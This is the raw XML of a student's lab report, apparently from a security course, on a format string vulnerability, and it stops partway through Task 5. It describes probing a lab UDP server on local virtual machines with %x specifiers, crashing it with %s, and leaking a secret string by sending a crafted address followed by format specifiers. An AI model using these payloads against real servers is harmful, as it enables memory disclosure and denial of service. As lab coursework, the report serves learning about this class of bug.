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F6F89" w14:textId="420D2EF6" w:rsidR="00450834" w:rsidRDefault="007328B2" w:rsidP="00B765C4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Name:</w:t>
      </w:r>
      <w:r w:rsidR="00B765C4">
        <w:t xml:space="preserve"> Bharath Karumudi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607AB40A" w14:textId="6F96BD8D" w:rsidR="007328B2" w:rsidRDefault="007328B2" w:rsidP="00B765C4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Lab:</w:t>
      </w:r>
      <w:r w:rsidR="00B765C4">
        <w:t xml:space="preserve"> Format String Vulnerability and Shell Shock Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1842AD96" w14:textId="510A0804" w:rsidR="007328B2" w:rsidRDefault="007328B2"/>
    <w:p w14:paraId="08E267F5" w14:textId="45B2D018" w:rsidR="007328B2" w:rsidRPr="005138FF" w:rsidRDefault="007328B2" w:rsidP="005138FF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005138FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part 1: The format string vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CEE350" w14:textId="25F33EEB" w:rsidR="007328B2" w:rsidRDefault="007328B2"/>
    <w:p w14:paraId="7FC18274" w14:textId="1464BCE1" w:rsidR="007328B2" w:rsidRDefault="007328B2">
      <w:r>
        <w:t>Task 1: The vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AEC898" w14:textId="07526CA7" w:rsidR="007328B2" w:rsidRDefault="007328B2"/>
    <w:p w14:paraId="001EF8D8" w14:textId="1237E7CC" w:rsidR="007328B2" w:rsidRDefault="00887929">
      <w:r w:rsidRPr="00887929">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05C42739" wp14:editId="1C796CCE">
            <wp:extent cx="6566953" cy="2877953"/>
            <wp:effectExtent l="0" t="0" r="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69372" cy="2879013"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE709F" w14:textId="3DD53B97" w:rsidR="00887929" w:rsidRDefault="00887929"/>
    <w:p w14:paraId="385BEBCB" w14:textId="3C42830B" w:rsidR="00887929" w:rsidRDefault="00887929">
      <w:r w:rsidRPr="00D02DBE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Created a local NAT network and booted two different VMs and allocated two different IPs, 10.0.2.4 for server and 10.0.2.15 for Client. The program server was compiled and executed with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on server side. On client side, started the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on server port 9090. When typed a “Test Message” it appeared on the Server side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66897CE3" w14:textId="4388F638" w:rsidR="00887929" w:rsidRDefault="00887929"/>
    <w:p w14:paraId="785A8F71" w14:textId="02266013" w:rsidR="00887929" w:rsidRDefault="00887929">
      <w:r w:rsidRPr="00D02DBE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D02DBE">
        <w:t xml:space="preserve">Both the VMs are created in NAT network, so they can talk each other. The client will be sending the UDP packets to the server side. The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D02DBE">
        <w:t>server side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D02DBE">
        <w:t xml:space="preserve"> program is reading the buffer and printing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C751C" w14:textId="15406C02" w:rsidR="003E7AED" w:rsidRDefault="003E7AED"/>
    <w:p w14:paraId="637C378F" w14:textId="2F6C4796" w:rsidR="00D02DBE" w:rsidRDefault="00D02DBE"/>
    <w:p w14:paraId="680308C7" w14:textId="5774987A" w:rsidR="00D02DBE" w:rsidRDefault="00D02DBE"/>
    <w:p w14:paraId="2F0A6686" w14:textId="3D0BF33A" w:rsidR="00D02DBE" w:rsidRDefault="00D02DBE"/>
    <w:p w14:paraId="0E7EDC07" w14:textId="33CBB7DC" w:rsidR="00D02DBE" w:rsidRDefault="00D02DBE"/>
    <w:p w14:paraId="2959390E" w14:textId="5EEEA886" w:rsidR="00D02DBE" w:rsidRDefault="00D02DBE"/>
    <w:p w14:paraId="04C3FFBD" w14:textId="6E36AE14" w:rsidR="00D02DBE" w:rsidRDefault="00D02DBE"/>
    <w:p w14:paraId="42C12CDA" w14:textId="07E27D24" w:rsidR="00D02DBE" w:rsidRDefault="00D02DBE"/>
    <w:p w14:paraId="16E78EAB" w14:textId="4C58FFA0" w:rsidR="00D02DBE" w:rsidRDefault="00D02DBE"/>
    <w:p w14:paraId="0D537E3C" w14:textId="571E86DB" w:rsidR="00D02DBE" w:rsidRDefault="00D02DBE"/>
    <w:p w14:paraId="49286F34" w14:textId="2F3EEA18" w:rsidR="00D02DBE" w:rsidRDefault="00D02DBE"/>
    <w:p w14:paraId="3483142D" w14:textId="6A3E556C" w:rsidR="003E7AED" w:rsidRDefault="003E7AED"/>
    <w:p w14:paraId="746004E5" w14:textId="4EADAE33" w:rsidR="00961482" w:rsidRDefault="00961482">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800B1AA" w14:textId="4DACD07A" w:rsidR="00961482" w:rsidRDefault="00961482"/>
    <w:p w14:paraId="163E1F76" w14:textId="0A766F8D" w:rsidR="00961482" w:rsidRDefault="00EF3BFA">
      <w:r w:rsidRPr="00EF3BFA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BD520F7" wp14:editId="0BA8C77B">
            <wp:extent cx="5943600" cy="2317296"/>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337"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2317296"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA21809" w14:textId="3186BF32" w:rsidR="008D1F99" w:rsidRDefault="008D1F99" w:rsidP="008D1F99">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1961B922" w14:textId="6B7480EE" w:rsidR="008D1F99" w:rsidRDefault="008D1F99" w:rsidP="008D1F99">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008D1F99">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F831EAC" wp14:editId="7445DACA">
            <wp:extent cx="3560885" cy="3497674"/>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3867"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3563758" cy="3500496"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E856C57" w14:textId="77777777" w:rsidR="008D1F99" w:rsidRDefault="008D1F99"/>
    <w:p w14:paraId="692D8424" w14:textId="61106814" w:rsidR="00EF3BFA" w:rsidRDefault="00EF3BFA"/>
    <w:p w14:paraId="4D75BB8E" w14:textId="2A13B17B" w:rsidR="00EF3BFA" w:rsidRDefault="00EF3BFA">
      <w:r w:rsidRPr="008D1F99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D1F99">
        <w:t xml:space="preserve">Used </w:t>
      </w:r>
      <w:r w:rsidR="008D1F99" w:rsidRPr="008D1F99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trial</w:t>
      </w:r>
      <w:r w:rsidRPr="008D1F99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and Error</w:t>
      </w:r>
      <w:r w:rsidR="008D1F99">
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> printed the %x and after using 7%x able to see the format string</w:t>
      </w:r>
      <w:r w:rsidR="008D1F99">
        <w:t xml:space="preserve"> and with 24%x, able to get the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4A3C44" w14:textId="681DC2AA" w:rsidR="00961482" w:rsidRDefault="00961482"/>
    <w:p w14:paraId="58C1E892" w14:textId="2609AB66" w:rsidR="008D1F99" w:rsidRPr="008D1F99" w:rsidRDefault="008D1F99">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D1F99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E2B70" w14:textId="50C9A9A8" w:rsidR="008D1F99" w:rsidRDefault="008D1F99" w:rsidP="008D1F99">
      <w:p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Question 1: What are the memory addresses at the locations marked by 1,2,3: bffff074, bffff08c, bffff0d0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C013B60" w14:textId="19B657E9" w:rsidR="008D1F99" w:rsidRDefault="008D1F99" w:rsidP="008D1F99">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Question 2: What is the distance between the locations marked by 1,3:  5C (92).</w:t>
      </w:r>
      <w:r w:rsidR="00E04154">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Used: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00E04154" w:rsidRPr="00E04154">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Calculator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E04154">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D6ABB" w14:textId="3A47BFFD" w:rsidR="00961482" w:rsidRDefault="00961482"/>
    <w:p w14:paraId="6D9D1AE8" w14:textId="77777777" w:rsidR="00DC69A1" w:rsidRDefault="00DC69A1"/>
    <w:p w14:paraId="79C6ACC3" w14:textId="4AF557C8" w:rsidR="00961482" w:rsidRDefault="00961482">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task 3: Crash the program </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC8251" w14:textId="2BE00BCF" w:rsidR="00961482" w:rsidRDefault="00961482"/>
    <w:p w14:paraId="4D31C862" w14:textId="6B6B471E" w:rsidR="00961482" w:rsidRDefault="00961482">
      <w:r w:rsidRPr="00961482">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F662A71" wp14:editId="305BA153">
            <wp:extent cx="6403820" cy="2368459"/>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515"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6404565" cy="2368734"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9434C0" w14:textId="09B85E21" w:rsidR="00EF289E" w:rsidRDefault="00EF289E"/>
    <w:p w14:paraId="00FFCA32" w14:textId="7B4DB789" w:rsidR="00EF289E" w:rsidRDefault="00EF289E">
      <w:r w:rsidRPr="008D1F99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008D1F99">
        <w:t xml:space="preserve"> Sent four %s </w:t>
      </w:r>
      <w:r w:rsidR="00E159E9">
        <w:t xml:space="preserve">format specifier </w:t>
      </w:r>
      <w:r w:rsidR="008D1F99">
        <w:t>as buffer input and the program crashed with Segmentation fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2000F" w14:textId="4859007D" w:rsidR="00EF289E" w:rsidRDefault="00EF289E"/>
    <w:p w14:paraId="2999D837" w14:textId="202C3D2F" w:rsidR="00EF289E" w:rsidRDefault="00EF289E">
      <w:r w:rsidRPr="008D1F99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008D1F99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F735C">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="008D1F99">
        <w:t xml:space="preserve">he input </w:t>
      </w:r>
      <w:r w:rsidR="004F735C">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="008D1F99">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="004F735C">
        <w:t xml:space="preserve"> given as</w:t>
      </w:r>
      <w:r w:rsidR="008D1F99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E04154">
        <w:t xml:space="preserve">format specifier %s, so the program </w:t>
      </w:r>
      <w:r w:rsidR="004F735C">
        <w:t>treats the obtained value as address and starts printing the data from the address. But the accessing data might be illegal – protected memory, Null pointers, virtual addresses etc. When accessed such addresses, the program will crash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760FC4A9" w14:textId="77777777" w:rsidR="00EF289E" w:rsidRDefault="00EF289E"/>
    <w:p w14:paraId="1974885D" w14:textId="7C53E4BD" w:rsidR="00EF289E" w:rsidRDefault="00EF289E">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397B16FA" w14:textId="01E18103" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="431F07C3" w14:textId="18799C1C" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="0C66A79B" w14:textId="59389915" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="6B55A82C" w14:textId="50218F41" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="3281806A" w14:textId="2D282725" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="7872789A" w14:textId="5A8994B2" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="6B1A481A" w14:textId="6A4D0CAC" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="28EC0CCF" w14:textId="02B43160" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="55D6F0FD" w14:textId="31E7EDD5" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="299BDFA5" w14:textId="5BDF798F" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="27473AC4" w14:textId="72A6468B" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="6FED3E6D" w14:textId="7B80C638" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="16413E78" w14:textId="60063944" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="69CFBDF7" w14:textId="61B7ABE2" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="5E49E04E" w14:textId="4648A858" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="6C6F24D6" w14:textId="7EE52305" w:rsidR="009E66D6" w:rsidRDefault="009E66D6"/>
    <w:p w14:paraId="377D6BA1" w14:textId="77777777" w:rsidR="009E66D6" w:rsidRDefault="009E66D6"/>
    <w:p w14:paraId="4CAEF16E" w14:textId="6E70DFA7" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="7B40E993" w14:textId="044D996D" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="3003A92A" w14:textId="77777777" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="60CD6871" w14:textId="4E32DBC4" w:rsidR="0092418D" w:rsidRDefault="008817B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Print Out the Server Program’s Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1025C92B" w14:textId="14A33DBB" w:rsidR="008817B7" w:rsidRDefault="008817B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5583F0DF" w14:textId="42DD7623" w:rsidR="008817B7" w:rsidRDefault="008817B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">4A: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Stack Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2FD6CF" w14:textId="7950A49A" w:rsidR="008817B7" w:rsidRDefault="008817B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C7AD3F" w14:textId="3627E23F" w:rsidR="008817B7" w:rsidRDefault="00E04154">
      <w:r w:rsidRPr="00E04154">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="331F4F5F" wp14:editId="01AC9C64">
            <wp:extent cx="5943600" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>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47925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4B1DA" w14:textId="58E14BE5" w:rsidR="008817B7" w:rsidRDefault="008817B7"/>
    <w:p w14:paraId="5629726C" w14:textId="54789BFE" w:rsidR="008817B7" w:rsidRDefault="008817B7">
      <w:r w:rsidRPr="000D741E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="000D741E">
        <w:t xml:space="preserve"> When tried with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D95833" w14:textId="711951F3" w:rsidR="008817B7" w:rsidRDefault="008817B7"/>
    <w:p w14:paraId="7369C4AB" w14:textId="63D8AFD6" w:rsidR="008817B7" w:rsidRDefault="008817B7">
      <w:r w:rsidRPr="000D741E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADE8C12" w14:textId="16B05486" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="05A7652F" w14:textId="5EB55957" w:rsidR="000D741E" w:rsidRDefault="000D741E"/>
    <w:p w14:paraId="6E313572" w14:textId="4B4B9D88" w:rsidR="008C4020" w:rsidRDefault="008C4020"/>
    <w:p w14:paraId="2EE74EA9" w14:textId="77777777" w:rsidR="008C4020" w:rsidRDefault="008C4020"/>
    <w:p w14:paraId="2B6817F0" w14:textId="3E52AD37" w:rsidR="008817B7" w:rsidRDefault="008817B7">
      <w:r>
        <w:t>4B: Heap Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A17EA4E" w14:textId="450A0145" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="2BDF84C4" w14:textId="2A0B625E" w:rsidR="008817B7" w:rsidRDefault="009E66D6">
      <w:r w:rsidRPr="009E66D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11C97430" wp14:editId="1706C73E">
            <wp:extent cx="5943370" cy="2284548"/>
            <wp:effectExtent l="0" t="0" r="635" b="190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670"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2284636"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="372CB09B" w14:textId="487FFAC9" w:rsidR="0092418D" w:rsidRDefault="0092418D"/>
    <w:p w14:paraId="70C4BEA5" w14:textId="5695CD47" w:rsidR="0092418D" w:rsidRDefault="00380109">
      <w:r w:rsidRPr="009E3329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DE4537">
        <w:t xml:space="preserve"> Created the binary input with the secret address and </w:t>
      </w:r>
      <w:r w:rsidR="00DC69A1">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="00DC69A1" w:rsidRPr="00DC69A1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>trial and error</w:t>
      </w:r>
      <w:r w:rsidR="00DE4537">
        <w:t xml:space="preserve"> with 24 format specifiers, so I used 23 %x and then with %s to print the string. When gave the input to the </w:t>
      </w:r>
      <w:r w:rsidR="00261F47">
        <w:t>server program</w:t>
      </w:r>
      <w:r w:rsidR="00DE4537">
        <w:t>, the secret message was printed at the server side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5432F29A" w14:textId="4191EBCA" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="160F892A" w14:textId="4F4C67A1" w:rsidR="00380109" w:rsidRDefault="00380109">
      <w:r w:rsidRPr="009E3329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DE4537">
        <w:t xml:space="preserve">The secret address is at 0x080487c0, so created the binary address </w:t>
      </w:r>
      <w:r w:rsidR="00DE4537" w:rsidRPr="00DE4537">
        <w:t>﻿$(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE4537" w:rsidRPr="00DE4537">
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE4537" w:rsidRPr="00DE4537">
        <w:t xml:space="preserve"> "\xc0\x87\x04\x08")</w:t>
      </w:r>
      <w:r w:rsidR="00DE4537">
        <w:t xml:space="preserve"> and then format specifiers to access the secret message. </w:t>
      </w:r>
      <w:r w:rsidR="009E3329">
        <w:t>The %s will read the address and get the content from the address, which is secret message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41307A88" w14:textId="77777777" w:rsidR="003D52FC" w:rsidRDefault="003D52FC"/>
    <w:p w14:paraId="7AC62FFF" w14:textId="202C5322" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="5F7DFED0" w14:textId="3DC6BA42" w:rsidR="00380109" w:rsidRDefault="00380109">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Task 5: Change the Server Program’s Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE454B0" w14:textId="5191AE31" w:rsidR="00380109" w:rsidRDefault="00380109">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="196AD382" w14:textId="78C00270" w:rsidR="0092418D" w:rsidRDefault="00380109">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Task 5.A: Change the value to a different value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792A8AFB" w14:textId="7022A89B" w:rsidR="00380109" w:rsidRDefault="00380109"/>
    <w:p w14:paraId="7CAB3206" w14:textId="3A0A6C97" w:rsidR="00380109" w:rsidRDefault="008C4020">
      <w:r w:rsidRPr="008C4020">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CF4C1A2" wp14:editId="1BA9BE25">
            <wp:extent cx="5942452" cy="2292350"/>
            <wp:effectExtent l="0" t="0" r="127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339"/>
